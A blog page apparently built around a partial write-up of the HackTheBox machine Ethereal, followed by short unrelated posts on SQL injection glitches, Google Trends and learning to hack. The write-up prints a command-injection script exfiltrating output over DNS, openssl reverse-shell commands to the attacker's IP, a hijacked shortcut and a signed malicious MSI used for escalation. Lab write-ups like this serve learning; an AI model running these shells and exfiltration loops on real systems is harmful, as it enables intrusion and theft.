Ethereal @ hackthebox: Certificate-Related Rabbit Holes

This post is related to the ‘insanely’ difficult hackthebox machine Ethereal (created by egre55 and MinatoTW) that was recently retired. Beware – It is not at all a full comprehensive write-up! I zoom in on openssl, X.509 certificates, signing stuff, and related unnecessary rabbit holes that were particularly interesting to me – as somebody who recently described herself as a Dinosaur that supports some legacy (Windows) Public Key Infrastructures, like the Cobol Programmers tackling Y2K bugs.

Ethereal was insane, because it was so locked down. You got limited remote command execution by exfiltrating the output of commands over DNS, via a ‘ping’ web tool with a command injection vulnerability. In order to use that tool you had to find credentials in a password box database that was hidden in an image of a DOS floppy disk buried in other files on an FTP server. See excellent full write-ups by 0xdf and by Bernie Lim, or watch ippsec’s video.

Regarding the DNS data exfiltration I owe to this m0noc’s great video tutorial. You parse the output of the command in a for loop, and exfil data in chunks that make up a ‘host name’ sent to your evil DNS server. I am embedding my RCE script below.

openssl – telnet-style

To obtain a reverse shell and to transfer files, you had to use openssl ‘creatively’ –  as a telnet replacement, running a ‘double shell’ with different windows for stdin and stdout.

In order to trigger this shell as ‘the’ user- the one with the flag, named jorge, you needed to overwrite an existing Windows shortcut file pointing to the Visual Studio 2017 executable (.LNK). I created ‘malicious’ shortcuts using the python library pylnk, on a Windows system. The folder containing that file was also the only place at all you could write to the file system as the initial ‘web injection user’, alan. I noticed that the overwritten LNK was replaced quickly, at least every minute – so I also hoped that a simulated user will ‘click’ the file every minute.

Creating certificate and key …

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Listening on the only ports open for outgoing traffic with two ‘SSL servers’:

openssl s_server -key key.pem -cert cert.pem -port 73
openssl s_server -key key.pem -cert cert.pem -port 136

The Reverse shell command to be used in the LNK file uses the ‘SSL client’:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd 2>&1 | C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -connect 10.10.14.19:73 2>&1 &"

The first rabbit hole I fell into was that I used openssl more ‘creatively’ than what was maybe needed. Though I found this metasploit module with a double telnet-style shell for Linux I decided to work on replacing the LNK first, and only go for a reverse shell if a simple payload in the LNK would work.

Downside of that approach: I needed another way of transferring the LNK file! If I had the reverse shell, already I’d been be able to use ‘half of it’ for transferring a file in the spirit of nc.

1) Run a ‘SSL server’ locally to be prepared for sending the file:

openssl s_server -quiet -key key.pem -cert cert.pem -port 73 <to_be_copied

2) Receive it using the SSL client:

openssl.exe s_client -quiet -connect 10.10.14.19:73 >to_be_copied

The usual ways to transfer files were blocked, for example certutil. certutil and certreq are the tools that are sort of an equivalent of openssl on Windows. certutil’s legit purpose is to manage the Windows PKI, manage certificate stores, analzye certificates, publish to certificate stores, download certificate revocation lists, etc. … The latter option makes it a ‘hacker tool’ because it lets you download other files like wget or curl (depending on the version of Windows and Defender’s vigilance doing heuristic checks of the action performed, rather than on the EXE itself).

Nearly missing out on openssl

When I saw openssl – installed on Windows! – I hoped I was on to something! However, I nearly let go of openssl as I failed to test it properly. I  ran openssl help in my nslookup shell, and did not get any response. Nearly any interesting EXE was blocked on Ethereal, so it came not as a surprise that openssl seemed to be, too.

Only after I was stuck for quite a while and a kind soul gave me a nudge to not abandon openssl too fast, I realized that the openssl help output is actually sent to standard error, not standard out.

You can redirect stderr to stdout using 2>&1 – but if you run the command ’embedded’ in the for loop (see python script below), you better escape both special characters like this:

'C:\progra~2\openssl-v1.1.0\bin\openssl.exe help 2^>^&1'

File transfer with openssl base64 and echo

My solution was to base64 encode the file locally with openssl (rather than using base64, just ‘to play it safe’), to echo out the file in  the DNS shell as alan on Ethereal, then base64 decode it and store it in the final location. I had issues with echoing out the full content in one line, so I did not use the –A option in openssl base64, but echoed one line after the other.

I missed that I can write to the folder – I believed I could only write to this single LNK file. So I had to echo to the exact same file that I would also use as the final target, like so:

type target.lnk | openssl base64 -d -out target.lnk

Below is my final RCE script for a simple ‘shell’ – either executing input commands 1:1 or special (series of) commands using shortcuts. E.g. for ‘echo-uploading’ a file, decoding, and checking the result I used

F shell.lnk
decode
showdir

In case I wanted to run a command without having to worry about escaping I can also run it blind, without any output via nslookup.

Script rce.py

import requests
import readline
import os
import sys

url = 'http://ethereal.htb:8080/'
headers = { 'Authorization' : 'Basic YWxhbjohQzQxNG0xN3k1N3IxazNzNGc0MW4h' }

server_dns = '10.10.14.19'
A_dns = 'D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z.'
template = '127.0.0.1 & ( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
template_blind = '127.0.0.1 & _CMD_'
template_lnk = '( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
# CSRF protections not automated as they did not change that often
# Copy from Burp, curl etc.
postdata = { 
    '__VIEWSTATE' : '/wEPDwULLTE0OTYxODU3NjhkZG8se05Gp91AdhB+bS+3cb/nwM7/1XnvqTtUaEoqfbcF',
    '__VIEWSTATEGENERATOR' : 'CA0B0334',
    '__EVENTVALIDATION' : '/wEdAAMwTZWDrxbqRTSpQRwxTZI24CgZUgk3s462EToPmqUw3OKvLNdlnDJuHW3p+9jPAN/MZTRxLbqQfS//vLHaNSfR4/D4qt+Wcl4tw/wpixmG9w==',
    'ctl02' : ''
}

target_lnk = 'C:\Users\Public\Desktop\Shortcuts\Visual Studio 2017.lnk'
target_lnk_dos = 'C:\Users\Public\Desktop\Shortcuts\Visual~1.lnk'
target_dir = 'C:\Users\Public\Desktop\Shortcuts\\'

openssl_path = 'C:\progra~2\openssl-v1.1.0\\bin\openssl.exe'

ask = True

def create_echo(infile_name, outfile_path):
    
    # File name must not include blanks
    b64_name = infile_name + '.b64'

    echos = []

    if not os.path.isfile(infile_name):
        print 'Cannot read file!'
        return echos
    else:
        os.system('openssl base64 -in ' + infile_name + ' -out ' + b64_name)
        f = open(b64_name, 'r')
    
    i = 0
    for line in f:
        towrite = line[:-1]
        if i == 0:
            echos += [ 'cmd /c "echo ' + towrite + ' >' + outfile_path + '"' ] 
        else:
            echos += [ 'cmd /c "echo ' + towrite + ' >>' + outfile_path + '"' ] 
        print line[:-1]
        i += 1

    f.close()
    return echos

def payload(cmd):
    return template.replace('_CMD_', cmd)

def payload_blind(cmd):
    return template_blind.replace('_CMD_', cmd)

def send(payload):
    print payload
    print ''
    
    if ask == True:
       go = raw_input('Enter n for discarding the command >>: ')
    else:
       go = 'y'

    if go != 'n':
        postdata['search'] = payload
        response = requests.post(url, data=postdata, headers=(headers))
        print 'Status Code: ' + str(response.status_code)
    else:
        print 'Not sent: ' + cmd

while True:

    cmd = raw_input('\033[41m[dnsexfil_cmd]>>: \033[0m ')

    if cmd == 'quit': 
        break

    elif cmd == 'dontask':
        ask = False
        print 'ask set to: ' + str(ask)
    elif cmd == 'ask':
        ask = True
        print 'ask set to: ' + str(ask)

    elif cmd[0:2] == 'F ':
        infile = cmd[2:]
        echos = create_echo(infile, target_lnk_dos)
        link = ' & '
        cmd_all_echos = link.join(echos)
        send(payload_blind(cmd_all_echos))

    elif cmd[0:2] == 'B ':
        cmd_blind = cmd[2:]
        send(payload_blind(cmd_blind))
       
    elif cmd == 'decode':
        cmd = 'type "' + target_lnk + '" | ' + openssl_path + ' base64 -d -out "' + target_lnk + '"'
        send(payload_blind(cmd))

    elif cmd == 'showdir':
        cmd = 'dir ' + target_dir
        send(payload(cmd))

    elif cmd == 'showfile':
        cmd = 'type "' + target_lnk + '"'
        send(payload(cmd))

    else:
        send(payload(cmd))

Finding that elusive CA certificate

After I finally managed to run a shell as jorge I fell into lots of other rabbit holes – e.g. analyzing, modifying, and compiling a recent Visual Studio exploit.

Then I ran tasklist for the umpteenth time, and saw an msiexec process! And lo and behold, even my user jorge was able to run msiexec! This fact was actually not important, as I found out later that I should wait for another (admin) user to run something.

I researched ways to use an MSI for applocker bypass. As described in detail in other write-ups you could use a simple skeleton XML file to create your MSI with the WIX toolset. WIX was the perfect tool to play with at Christmas when I did this box – it’s made up of executables called light.exe, candle.exe, lit.exe, heat.exe, shine.exe, torch.exe, pyro.exe, dark.exe, melt.exe … :-)

So I also created a simple MSI, ran it as jorge and nothing happened. Honestly, I cannot tell with hindsight if that should have possibly worked – just without any escalation to an admin or SYSTEM context – or I made an error again. But because of my focus on all things certificates and signatures, I suspected the MSI had to be signed – that would also be in line with the spirit of downlocking at this box.

Signed code does only run of the certificate is trusted. So I needed to sign the MSI either with a ‘universally’ / publicly trusted certificate (descending from a CA certified in the Microsoft Root Program) or there was possibly a key and certificate on the box I have not found yet. Both turned out to be another good chance for falling into rabbit roles!

Testing locally with certificates in the Windows store

I used one of my Windows test CAs and issued a Code Signing certificate, then used signtool to sign a test MSI. The reference to the correct store is in this case the CN of the Subject Name which should be unique in your store:

signtool sign /n Administrator /v pingtest.msi

The MSI could be ‘installed’ and my ping worked on a test Windows box. So I knew that the signing procedure worked, but I needed a certificate chain that Ethereal will trust. With hindsight, giving my false assumption that jorge will run the MSI, I should also have considered that jorge will install a Root CA certificate of my liking into his (user’s) Root certificate store. It should theoretically be doable fiddling with the registry only (see second hilarious rabbit hole below), but normally I would certutil for that. And certutil was definitely blocked.

Publicly trusted certificate

I do have one! Our Austrian health insurance smartcards have pre-deployed keys, and you can enroll for X.509 certificates for those keys. So on a typical Windows box, code signed with this ID card would run. But there is a catch: Windows does not – anymore, since Vista if I recall correctly – pre-populate the store with all the Root CAs certified by Microsoft. If you try to run a signed MSI (or visit an HTTPS website, or read a signed e-mail), then Windows will download the required root certificate as needed. But hackthebox machines are not able to access the internet.

Yet, in despair I tried, for the unlikely case all the roots were there. Using signtool like so, it will let me pick the smartcard certificate, and I was prompted for the PIN:

signtool sign /a /v pingtest.msi

So if my signed signed had screwed up the box, I could not have denied it – a use-case of the Non-Repudation Key Usage ;-)

Uploaded my smartcard-signed MSI. And failed to run it.

Ages-old Demo CA – and how to use openssl for signing

There was actually a CA on the box, sort of – the demoCA that comes with the openssl installation. A default CA key and certificate comes with openssl, and the perl script CA.pl can be used to created ‘database-like files and folders’. In despair I used this default CA certificate and key – maybe it was was trusted as kind of subtle joke? I did not bother to look closely at the CA certificate – otherwise I should have noticed it had expired long ago :-)

The process I tested for signing was the same I used later. As makecert is the tool that many others have used to solve this, I quickly sum up the openssl process.

You can either use the openssl ca ‘module’ – or openssl x509. The latter is a bit simpler as you do not need to prepare the CA’s ‘database’ directories.

Of course I used Windows GUI tools to create the request :-)

  • Start, Run, certmgr.msc
  • Personal, All Tasks, Advanced Operations, Create Custom Request
  • Custom PKCS#10 Request.
  • Extensions:
    Key Usage = Digital Signature
    Extended Key Usage = Code Signing
  • Private Key, Key Options: 2048 Bit
  • BASE64 encoding

The result is a BASE64 encoded ‘PEM’ certificate signing request. You can sign with the demoCA’s key like this – I did this on my Windows box.

openssl x509 -req -in req.csr -CA cacert.pem -CAkey private\cakey.pem -CAcreateserial -out codesign.crt -days 500 -extfile codesign.cnf -extensions codesign

There are different ways to make sure that the Code Signing Extended Key Usage gets carried over from the request to the certificate, or that it is ‘added again’. In the openssl.cnf config file (default or referenced via -config) you can e.g. configure to copy_extensions.

In the example above, I used a separate file for extensions. (Values seem to be case-sensitive, also on Windows).

[ codesign ]

keyUsage=digitalSignature
extendedKeyUsage=codeSigning

To complete the process, the Root CA certificate is imported in the the Trusted Root Certification Authorities store in certmgr.msc,  and the Code Signing certificate is imported into Personal certificates in certmgr.msc. In case the little key icon does not show up, key and certificate have not been properly united, which can be fixed with

certutil -repairstore -user my [Serial Number of the cert]

The file is signed without issues, however the resulting chain violates basic requirements for certificate path validation: The CA’s end of life was in 1998.

certutil cacert.pem

X509 Certificate:
Version: 1
Serial Number: 04
Signature Algorithm:
Algorithm ObjectId: 1.2.840.113549.1.1.4 md5RSA
Algorithm Parameters:
05 00
Issuer:
CN=SSLeay/rsa test CA
S=QLD
C=AU
Name Hash(sha1): 4f28bdc33fb78c854e2ceb26210f981bb73ce9ea
Name Hash(md5): ee7084bbed50615d1e118ff2ada590cf

NotBefore: 10.10.1995 00:32
NotAfter: 06.07.1998 00:32

Subject:
CN=SSLeay demo server
OU=CS
O=Mincom Pty. Ltd.
S=QLD
C=AU

Weird way to find a CA certificate

This was – for me – the most hilarious part of owning this box. The mysterious Root CA had to be in the Windows registry, and I had no certutil. So I resorted to looking at the registry directly.

‘Windows Certificate stores’ are collections of different registry key, this was the one relevant here.

C:\>reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
....

But I wanted to look into the binary certificates with those keys so I dumped each of the keys (like 18F7C1FCC3090203FD5BAA2F861A754976C8DD25) and copied the contents from the terminal to a python script. This snippet shows only a single cert in the list:

certs = [
...
'190000000100000010000000E53D34CECB05C17EE332C749D78C02560F000000010000001000000065FC47520F66383962EC0B7B88A0821D03000000010000001400000018F7C1FCC3090203FD5BAA2F861A754976C8DD2509000000010000000C000000300A06082B060105050703080B000000010000003400000056006500720069005300690067006E002000540069006D00650020005300740061006D00700069006E00670020004300410000001400000001000000140000003EDF290CC1F5CC732CEB3D24E17E52DABD27E2F02000000001000000C0020000308202BC3082022502104A19D2388C82591CA55D735F155DDCA3300D06092A864886F70D010104050030819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E301E170D3937303531323030303030305A170D3034303130373233353935395A30819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E30819F300D06092A864886F70D010101050003818D0030818902818100D32E20F0687C2C2D2E811CB106B2A70BB7110D57DA53D875E3C9332AB2D4F6095B34F3E990FE090CD0DB1B5AB9CDE7F688B19DC08725EB7D5810736A78CB7115FDC658F629AB585E9604FD2D621158811CCA7194D522582FD5CC14058436BA94AAB44D4AE9EE3B22AD56997E219C6C86C04A47976AB4A636D5FC092DD3B4399B0203010001300D06092A864886F70D01010405000381810061550E3E7BC792127E11108E22CCD4B3132B5BE844E40B789EA47EF3A707721EE259EFCC84E389944CDB4E61EFB3A4FB463D50340B9F7056F68E2A7F17CEE563BF796907732EB095288AF5EDAAA9D25DCD0ACA10098FCEB3AF2896C479298492DCFFBA674248A69010E4BF61F89C53E593D1733FF8FD9D4F84AC55D1FD116363',
....
]
for cert in certs:
    print '======================================='
    print cert
    print '======================================='
    print cert.decode('hex')
    print '======================================='

OK, certainly not the most elegant way to deal with it, but I was loosing patience – I was on a war path!!

Strings in the output contain the CA’s Issuer and Subject Name, and most were familiar Microsoft, Versign, etc. With this exception:

=======================================
¬·╟<          òë┌┐ò$º¿Y╔&┌╢e½s╦π≥│τÇ╤#w▌╙o╠D       ╖è╔└eîqD╕ß!└öPδ⌠ ¡      ü¿M»╬Φv√tÄ.LgawĽ0ß       τ9╡ïε╢æï
  é0é010 U  My CA0é"0≥▀~àE~Γ<éíFj0
é ¥═p|ÉÉ▒ôfD╬,°á3╣Zƒ╕Cáφs╖Kεmìδ╗wFo2ßÄK ┘Xì╧Y?ÉR╢&,V┘Ω╠û5¬Σ▒┴Γ╧B·Gb4éτåi0Ku rí╕Oh≈φ¬u≤h¥J ┌┌º(┐Jk<√=-9{£H[▀ªP&«¢ΣU■2~ ½Öº-4║o/σ£oºå─∙Åédü¿éÅêr▐O.╘<'Qu∙w0~▒A±·â·{k
  é hòÿâ⌠╝*εC╡Åπs⌠╝[░╣±kπ{≥¬æ±¬╠b┐╤GëJ»i%┴       ╕ìiΦπ %¬*π[ò╗,9ü:╦-5  úV0T0 U  0  0A U :08ǽÖ┬ï]═8¬I¡X^⌠í010 U  My CAé÷h≥▀~àE~Γ<éíFj0

▀ó*┌û╞Qfè£ⁿ─;Lτ·II╫─╓┴¼╤N∩j Φ
)x═Mπ╪₧⌠ç╛ê┤YF:╛╢╙êDτσªM]Gá⌐ S≡∞Yg J»╪u

...

Maybe hard to spot, but there was a CA called My CA! But where was the key I needed to sign my own Code Signing cert?

In such cases, I typically resort to more Windows registry forensics. I hoped that ‘jorge’ or the box’ creators had touched a folder with these certificate and key. I walked through various Explorer-related keys, especially the infamous Shellbags:

HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2
    NodeSlot    REG_DWORD    0x3
    MRUListEx    REG_BINARY    0100000000000000FFFFFFFF
    0    REG_BINARY    4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000
    1    REG_BINARY    5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000

HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1

… and I really saw a folder called Certs after decoding:

>>> print s.decode('hex')
n 1     µLGu VISUAL~1  V          ∩╛µLGuµLGu.   z¿                    åUÉ V i s u a l   S t u d i o   2 0 1 7   
>>> s='4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000'
>>> print s.decode('hex')
J 1     █L╓│ DEV 8        ∩╛█LÅ│█L╓│.   $                    Ö0e D E V   
>>> s='5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000'
>>> print s.decode('hex')
P 1     τLJ« Certs <      ∩╛τLA«τLJ«.   I.                    Ωτ╜ C e r t s    >>>

… and a link to a folder called MSIs:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder
    0    REG_BINARY    5000750062006C0069006300000060003200000000000000000000005075626C69632E6C6E6B0000460009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000005000750062006C00690063002E006C006E006B0000001A000000
    MRUListEx    REG_BINARY    020000000100000000000000FFFFFFFF
    1    REG_BINARY    4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000
...
>>> s='4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000'
>>> print s.decode('hex')
M S I s   Z 2           MSIs.lnk  B        ∩╛        .                             M S I s . l n k   
>>> 

Then I did what I should have done before – checking out the Recent Docs folder directly …

Directory of C:\Users\jorge\AppData\Roaming\Microsoft\Windows\Recent

07/07/2018  09:47 PM               405 EFS.lnk
07/07/2018  09:53 PM               555 MSIs.lnk
07/07/2018  09:53 PM               678 note.lnk
07/07/2018  09:49 PM               690 Public.lnk
07/09/2018  09:13 PM               612 system32.lnk
07/04/2018  09:17 PM               527 user.lnk

…. the file MSIs.link contained the path:

...
D:\DEV\MSIs
...

So there was a D: drive I had totally missed – and there you found a key MyCA.pvk and a certificate MyCA.cer.

The ‘funny’ thing now is that the LNK file hijacked before pointed to Visual Studio installed on the D: drive. So the intended way was likely to go straight to this folder, see certificates and and MSIs folder, and conclude you need to sign an MSI.

Signing that darn thing finally :-)

I wanted to re-use the openssl process I tested before. But openssl cannot use PVK files (AFAIK ;-) but you can convert PVK keys to PFX (PKCS#12)

I ran

pvk2pfx /pvk MyCA.pvk /spc MyCA.cer

… to start a GUI certificate export wizard that let me specify the PFX password.

Then I converted the PFX key to PEM

openssl pkcs12 -in MyCA.pfx -out MyCA.pem -nodes

… and the binary (‘DER’) certificate to PEM

openssl x509 -inform der -in MyCA.cer -out MyCA.cer.pem

I signed a Code Signing certificate for a user with CN Test 1 (same process as with the demoCA), and used this to sign the final payload! Imported MyCA.cer to the Trusted Roots and referenced again the CN of the user in signtool:

signtool sign /n "Test 1" /v half_shell_MyCA.msi
The following certificate was selected:
    Issued to: Test 1
    Issued by: My CA
    Expires:   Sat May 09 14:54:50 2020
    SHA1 hash: 0CDBA139B0E93813969E9E82F1E739C962BA6A3B

Done Adding Additional Store
Successfully signed: half_shell_MyCA.msi

Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0

I verified the MSI also with

signtool verify /pa /v half_shell_MyCA.msi

My final signed MSI payload was what I called a half shell, a command like this:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd &"

You can execute commands, but you do not get the output back. I tried to use my resources most efficiently.

A text note told us that the admin ‘rupal’ will test MSIs frequently. So I need one openssl listener – thus one of the two precious open ports – for waiting for rupal.

I used the other open port for uploading the MSI, ‘nc-style’ again with openssl.

But if I really wanted output from the blind half shell, I could also embed it in nslookup. So I used the rce.py to create this type of command (for that it has on option to just display but not run a command), that I would then paste into the input window of jorge’s half shell.

FOR /F "tokens=1-26" %a in ('copy half_shell_MyCA.msi D:\DEV\MSIs') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)

And rupal called back!

\o/

But he also only half a shell, so I read root.txt via nslookup, pasting this command into his half shell:

FOR /F "tokens=1-26" %a in ('type C:\Users\rupal\Desktop\root.txt') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)

What an adventure!

Ethereal-owned

Unintended 2nd Order SQL Injection

Why I am not afraid of the AI / Big Data / Cloud powered robot apocalypse.

SQL order injection means to run custom SQL queries through web interfaces because the input to the intended query is not sanitized, like appending the infamous ‘ OR ‘1’=’1 to a user name or search term. It is 2nd order when the offending string comes from the database, not from user input. So you would for example register a new user that is named admin ‘ OR ‘1’=’1. If you want to play with that register at hackthebox.eu, download sqlmap, write your Python scripts.

I have accepted a benign version of 2nd order SQL injection as a fact of life. Our company name has an ampersand in it, and now and then the company name gets truncated at the ampersand. Very cautious IT systems don’t even accept this hacker company name.

But it seems the (AI / Big Data / cloud powered) security filters get better and better. A parcel service messed up delivery in an interesting way:

Item 1 was delivered to a wrong address – not related to us in way any, but contact’s first name was in the street name.

Item 2 was delivered to us, but the company name was  truncated to a single word – contact’s last name right before the ampersand.

Was this the time some backend systems got an update of their security filters? I also got a purchase order e-mail without an actual PO attachment, but the company name was  truncated at the ampersand.

Maybe it also helps that our location’s code changed three years ago. Hardly any organization could deal with the change without support tickets and hacks – big US-based data krakens as well as local suppliers. This will take a while – our IT department will have to setup your new zip code! … Says the company whose core business is shipping things, months after the release of the new zip code.

Google support was helpful, but it took me a lot of back and forth to get the zip code corrected in Google Maps. In the beginning they added to the new zip code to the street address as a workaround. The location shows the old code to this day – we are the only place with the ‘new’ ZIP code.

Making fun of these glitches is unfair. You rather recognize the exceptional error than the many digital processes that run flawlessly. As a network administrator you know this: People only notice you if things go wrong.

However, I’d appreciate if companies would be more humble. Every time I fight with a weird glitch in Big Corp’s systems I see their marketing messages on social media about this superior digital experience.

But …

Software and cathedrals are much the same – first we build them, then we pray
— Samuel T. Redwine Jr. [ref]

 

We build our computer (systems) the way we build our cities: over time, without a plan, on top of ruins.
— Ellen Ullman [ref]

 

Cyber Something

You know you have become a dinosaur when you keep using outdated terminology. Everybody else uses the new buzz word, but you just find it odd. But someday it will creep also into your active vocabulary. Then I will use the tag cyber something, like stating that I work with cyber-physical systems.

But am I even right about the emergence of new terms? I am going to ask Google Trends!

I have always called it IT Security, now it is Cyber Security. I know there are articles written about the difference between Cyber Security and IT Security. However, when I read about Those 10 Important Things in Cyber Security, I see that the term is often used as a 1:1 replacement of what had been called IT Security. And even if you insist on them being different fields, the following Google Trends result would at least show that one has become more interesting to internet users.

I am also adding Infosec which I feel is also more ‘modern’ – or maybe only used specifically by community insiders.

cyber-security-it-security-infosec

Link: https://trends.google.com/trends/explore?date=today%205-y&q=Cyber%20Security,IT%20Security,Infosec

So Cyber Security is on the rise, but IT Security does is not yet on a decline. Infosec is less popular – and what about these spikes?

infosec

Link: https://trends.google.com/trends/explore?date=today 5-y&q=Infosec

This not what I expected – a sharp peak at the beginning of every June! This pattern rather reminds of searching for terms related to heating systems: Searches for heat pump peak in New Zealand every July – for obvious reasons. (Although it is interesting why only in NZ – I only zoomed in on NZ as it was the top region in the worldwide search on heat pump… But I digress!)

So I guess the spike is caused by one of the famous big IT Security Infosec conferences? Which one? I could not track it down unambiguously!

What about the non-abbreviated term – Information Security. Does it exhibit the same pattern?

information-security-infosec.png

Link: https://trends.google.at/trends/explore?date=today%205-y&q=Infosec,Information%20Security

Not at all. There is one negative spike in week 51 every year, and this pattern rather reminds me of the ‘holiday pattern’ I see in our websites’ statistics. Maybe that’s the one week in a year when also IT security Infosec people are on vacation?

Finally I want to cross-check the Cyber Physical and The Cyber in general:

Cyber Physical is not mainstream enough to show a trend…

cyber-physical

Link: https://trends.google.com/trends/explore?date=today%205-y&q=Cyber%20Physical

… and Cyber itself is again not at all what I expected!

cyber.png

Link: https://trends.google.com/trends/explore?date=today%205-y&q=Cyber

Mid of December every year we all search the The Cyber! Do the hackers attack every year when we are busy with shopping for presents or getting That Important Project done before End of Calendar Year?

Again I fail to google that one and only Cyber event in December – or maybe these spikes are all about Google bugs!

Epilogue / user manual: Don’t click on these links too often!

Hacking

I am joining the ranks of self-proclaimed productivity experts: Do you feel distracted by social media? Do you feel that too much scrolling feeds transforms your mind – in a bad way? Solution: Go find an online platform that will put your mind in a different state. Go hacking on hackthebox.eu.

I have been hacking boxes over there for quite a while – and obsessively. I really wonder why I did not try to attack something much earlier. It’s funny as I have been into IT security for a long time – ‘infosec’ as it seems to be called now – but I was always a member of the Blue Team, a defender: Hardening Windows servers, building Public Key Infrastructures, always learning about attack vectors … but never really testing them extensively myself.

Earlier this year I was investigating the security of some things. They were black-boxes to me, and I figured I need to learn about some offensive tools finally – so I setup a Kali Linux machine. Then I searched for the best way to learn about these tools, I read articles and books about pentesting. But I had no idea if these ‘things’ were vulnerable at all, and where to start. So I figured: Maybe it is better to attack something made vulnerable intentionally? There are vulnerable web applications, and you can download vulnerable virtual machines … but then I remembered I saw posts about hackthebox some months ago:

As an individual, you can complete a simple challenge to prove your skills and then create an account, allowing you neto connect to our private network (HTB Labs) where several machines await for you to hack them.

Back then I had figured I will not pass this entry challenge nor hack any of these machines. It turned out otherwise, and it has been a very interesting experience so far -to learn about pentesting tools and methods on-the-fly. It has all been new, yet familiar in some sense.

Once I had been a so-called expert for certain technologies or products. But very often I became that expert by effectively reverse engineering the product a few days before I showed off that expertise. I had the exact same mindset and methods that are needed to attack the vulnerable applications of these boxes. I believe that in today’s world of interconnected systems, rapid technological change, [more buzz words here] every ‘subject matter expert’ is often actually reverse engineering – rather than applying knowledge acquired by proper training. I had certifications, too – but typically I never attended a course, but just took the exam after I had learned on the job.

On a few boxes I could use in-depth knowledge about protocols and technologies I had  long-term experience with, especially Active Directory and Kerberos. However, I did not find those boxes easier to own than the e.g. Linux boxes where everything was new to me. With Windows boxes I focussed too much on things I knew, and overlooked the obvious. On Linux I was just a humble learner – and it seemed this made me find the vulnerability or misconfiguration faster.

I felt like time-travelling back to when I started ‘in IT’, back in the late 1990s. Now I can hardly believe that I went directly from staff scientist in a national research center to down-to-earth freelance IT consultant – supporting small businesses. With hindsight, I knew so little both about business and about how IT / Windows / computers are actually used in the real world. I tried out things, I reverse engineered, I was humbled by what remains to be learned. But on the other hand, I was delighted by how many real-live problems – for whose solution people were eager to pay – can be solved pragmatically by knowing only 80%. Writing academic papers had felt more like aiming at 130% all of the time – but before you have to beg governmental entities to pay for it. Some academic colleagues were upset by my transition to the dark side, but I never saw this chasm: Experimental physics was about reverse engineering natural black-boxes – and sometimes about reverse engineering your predecessors enigmatic code. IT troubleshooting was about reverse engineering software. Theoretically it is all about logic and just zero’s and one’s, and you should be able to track down the developer who can explain that weird behavior. But in practice, as a freshly minted consultant without any ‘network’ you can hardly track down that developer in Redmond – so you make educated guesses and poke around the system.

I also noted eerie coincidences: In the months before being sucked into hackthebox’ back-hole, I had been catching up on Python, C/C++, and Powershell – for productive purposes, for building something. But all of that is very useful now, for using or modifying exploits. In addition I realize that my typical console applications for simulations and data analysis are quite similar ‘in spirit’ to typical exploitation tools. Last year I also learned about design patterns and best practices in object-oriented software development – and I was about to over-do it. Maybe it’s good to throw in some Cowboy Coding for good measure!

